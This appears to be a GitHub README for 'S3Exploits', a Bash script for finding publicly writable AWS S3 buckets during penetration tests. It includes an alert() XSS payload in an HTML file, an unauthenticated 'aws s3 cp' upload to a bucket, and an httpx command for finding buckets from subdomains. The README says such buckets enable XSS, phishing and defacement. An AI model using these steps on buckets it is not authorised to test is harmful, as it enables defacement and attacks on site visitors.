_____ ____ ______ _ _ _
/ ____|___ \| ____| | | (_) |
| (___ __) | |__ __ ___ __ | | ___ _| |_ ___
\___ \ |__ <| __| \ \/ / '_ \| |/ _ \| | __/ __|
____) |___) | |____ > <| |_) | | (_) | | |_\__ \
|_____/|____/|______/_/\_\ .__/|_|\___/|_|\__|___/
| |
|_|
S3Exploits is a script that automates to find out the AWS misconfigured S3 buckets that can lead pentester to exposed many vulnerabilities (XSS, phishing, site deface, many more).
git clone https://github.com/Aju100/s3-exploit
cd s3-exploit
chmod +x main.sh
./main.sh
If you found vulnerable bucket, you can create html file that can include xss payload.
<html>
<head>
<title>XSS</title>
</head>
<body>
<script>alert(!)</script>
</body>
</html>
aws s3 cp 1.html s3://bucketname --no-sign-request
Go to the bucket's url like s3something.aws.com/1.html
You can also create image that include the xss payload too.
Note: Make sure you have install aws cli
sudo apt-get install awscli
You are required to insert the list of s3 buckets in s3_buckets to test whether it's vulnerable or not. If you are pentesting for other companies or organizations, make sure you use the below tools to identify s3 buckets.
If you have discovered subdomains, then you can also check out whether it has s3 buckets.
Make sure you have install httpx
cat sub-domains.txt | httpx -status-code --path .s3.amazonaws.com
If you are testing your own s3 buckets then use the below commands to list s3 buckets and create an s3_buckets.txt
First, you need to configure aws credentials.
aws configure
aws s3 ls >> buckets.txt
sed -E 's/([0-9]{1,4}-){1,2}[0-9]{2} ([0-9]{2}:){1,2}[0-9]{2}//g' buckets.txt >> s3_buckets.txt
Contributions are always welcome! Please read the contribution guidelines first.
If you need any help anywhere in the process, you can open Github issue.
This project is currently licensed under the MIT General Public License v3. i.e. we guarantee end users the freedom to run, study, share, and modify the software.
Made with ❤️ and Bash